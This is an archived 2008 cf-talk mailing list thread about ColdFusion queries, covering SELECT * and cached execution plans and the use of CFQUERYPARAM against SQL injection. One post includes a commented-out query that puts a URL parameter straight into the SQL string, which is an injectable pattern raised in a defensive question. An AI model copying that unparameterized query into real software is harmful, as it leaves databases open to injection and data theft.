Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Brad Wood
07/24/2008 02:23 PM

This is starting to sound like a bad multiple choice question from a college final...  :) ~Brad > Fine, it's always a good idea to never use * > > ;-) > > --- Ben

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Phillips
07/24/2008 02:36 PM

(Brad) >>This is starting to sound like a bad multiple choice question from a college final...  :) Escpecially our college, Brad. ;-) (Claude) >> It may be a silly question, but why a SELECT * will brake because an unused column was dropped? To clarify, it is a SELECT * query with a CFQUERYPARAM in it.  Because the first time the query is executed, an execution plan is built and cached. That execution plan extrapolates all the columns from the table since the * was used.  Now, once the query is executed once, drop a column from the table and run the query again.  It will fail because the column it is trying to reference (through the cached execution plan) is no longer there. Example table: Table name:  user Columns:  user_id, firstname, lastname, address1, address2, address3, city, state, zip CF code: <cfquery datasource="whatever" name="qGetUser"> SELECT * FROM user WHERE user_id = <cfqueryparam value="#url.user_id#" cfsqltype="cf_sql_integer"> </cfquery> Execute the CF Code - now the execution plan that is cached has a SELECT statement that looks something like this: SELECT user_id, firstname, lastname, address1, address2, address3, city, state, zip FROM user WHERE user_id = (param) Now, every time the query is run, it will use that execution plan until the query changes (not the parameter, the query). Okay, so now some db guy decides that address3 isn't in use and decides to drop it on a whim (we'll fire him later). Guess what, now every execution of your query will fail because 'address3' does not exist in the user table. It is true what someone said yesterday, that you could go into your code, change a space or new line, and rerun your code and now it will work (because the execution plan has been rebuilt).  However, how many failed requests between the time the column was dropped and you change your code will occur?  Who knows.  One is too many, that's for sure. So, as I stated before, and to take a spin off of Ben's recent comment:   It is always a good idea to never use SELECT * when using CFQUERYPARAM and since it is always a good idea to use CFQUERYPARAM then it is always a good idea to never use SELECT *. :) You can quote me on that. ;-) Dave Phillips

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Ian Skinner
07/24/2008 03:03 PM

Dave Phillips wrote: ----- Excess quoted text cut - see Original Post for more ----- To clarify the clarification, an execution plan is *always* built, whether the SQL uses the best practice of <cfqueryparam...> or not.   Without the <cfqueryparam...> many more execution plans may be generated depending on the nature of the queries and the application the live in and its usage.  Thus these non-queryparam plans can easily be pushed out the cache faster and thus the problem described will live for a shorter time.  But it can happen either way.

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 02:07 PM

> It may be a silly question, but why a SELECT * will brake > because an unused column was dropped? For the same reason that SELECT * will break if you use it in a view, run the view, then change the underlying schema. The "*" gets dereferenced to actual columns in the execution plan, which gets cached. If the columns change, the execution plan may no longer be valid. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 02:31 PM

> So if I wont use maxlenght still it is gonna be secured? Yes. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/25/2008 07:29 PM

Interesting question: <!--- <cfif isdefined('url.dimension')> <cfquery name="test" datasource="#DB#" username="#USER#" password="#PASS#">     select age,size     from accessories     where age='#url.age#' and visible=1 </cfquery></cfif> ---> This is commented query in the code: Do any of you think if can process commented? I dont think so. But I am curious these hackers can do crazy stuff. Probably I will get an answer put in the commented query cfqueryparam or delete it :) Radek On Thu, Jul 24, 2008 at 2:33 PM, Dave Watts <dwatts@figleaf.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 02:36 PM

> > If you don't really care > > I don't really care measuring the difference it makes, > because it must certainly be marginal, and it is not because > I don't care the difference it can made that I cannot make a > comment about it. If you want to be a contrarian for the sake of being a contrarian, go right ahead. However, you speculated that there might be overhead in creating an execution plan, when one is created whether you use CFQUERYPARAM or not! Then, immediately after that, you wrote that you don't care one way or the other. If you don't care one way or the other, why would that speculation be a deciding factor about whether to use CFQUERYPARAM? It seems to me that your sole justification for not using it, or using it selectively, or whatever, is that it's too much trouble to type it out. And if that's true, that's fine with me, because I don't really care about your applications specifically. It may well be the case that under specific conditions, there is a cost to using CFQUERYPARAM. For example, there may be some queries that benefit from having new execution plans generated each time they're run, instead of using a cached execution plan. But you have failed to identify any of those specific edge cases. You're not recommending that people attempt to identify these edge cases, either. And, in the absence of evidence about a specific case, the safe assumption is that building a prepared statement will not only provide complete protection against SQL injection, but will also improve performance. In ANY case, building a prepared statement that uses CFQUERYPARAM to wrap every piece of user-supplied data will provide complete protection against SQL injection, by its very nature - it tells the database the difference between executable code and data. Instead, you're throwing up a smokescreen of crap about why people shouldn't use it, or why they should be more selective in using it. You're willing to rely on all sorts of other things to provide what you see as equivalent to the protection you get from prepared statements - making sure your MySQL database is configured a certain non-default way, filtering out "bad words" from incoming HTTP requests, etc - but it would be easier and more reliable to just build the prepared statements in the first place! Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 03:04 PM

> How can it be processed when  USER_ID in database is > specified for LENGHT 15 and USER_ID with Hacker code has > lenght like 100? For the purpose of preventing SQL injection, the length of the field in your prepared statement doesn't matter. It is enough for it to be a prepared statement, which you build in CF using CFQUERYPARAM. Without it, the database has no idea which parts of the query are supposed to be executable SQL, and which parts are supposed to be data. In a successful SQL injection attack, the value that's injected would be more than just your USER_ID value; it would also contain executable SQL code, and your database would simply execute the code; it would not assume that this code is supposed to be part of your USER_ID value. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 03:09 PM

Great, yes understand, basically it runs another script against database so it assumes that it is not part of the user_id. good thanks. On Thu, Jul 24, 2008 at 3:05 PM, Dave Watts <dwatts@figleaf.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 03:12 PM

I noticed since I started securing the site also with tha cfif EXEC, I have lower hits with the code, 3 days ago and more I got hit like an every hour, these past 2 days I got 2 hits a day to the exact same page with exact same variables in url.... On Thu, Jul 24, 2008 at 3:05 PM, Radek Valachovic <rentgeeen@gmail.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/24/2008 03:37 PM

> If I do find any vunerabilities, is there something I can run > against the database to see if it has been infected? Well, for the current attack, you would look at your varchar/nvarchar/text/ntext columns to see if anything's been appended to them. This should be fairly easy to identify. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Radek Valachovic
07/24/2008 03:40 PM

Yes Exactly, Run the current attack, I am doing it to see how am I securing the site and it works! HAppy Attacking :) On Thu, Jul 24, 2008 at 3:39 PM, Dave Watts <dwatts@figleaf.com> wrote: ----- Excess quoted text cut - see Original Post for more -----

Top  |   Parent  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Al Musella, DPM
07/25/2008 06:55 PM

I set up a scheduled task to check my database every 15 minutes.  It looks for my entry in the users table, and compares my email address and website address with what is in the database.  IF it differs, I get an email.   I did the same thing for 10 different tables. ----- Excess quoted text cut - see Original Post for more -----

Top  |   Reply  |   Original Post  |   RSS Feed  |   Subscribe to this Group
Author:
Dave Watts
07/26/2008 12:49 AM

----- Excess quoted text cut - see Original Post for more ----- Code that is disabled by CFML comments isn't executed, and is therefore perfectly safe. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information!


<< Previous Thread Today's Threads Next Thread >>

Search cf-talk

November 23, 2014

<<   <   Today   >   >>
Su Mo Tu We Th Fr Sa
             1
2 3 4 5 6 7 8
9 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
30             

Designer, Developer and mobile workflow conference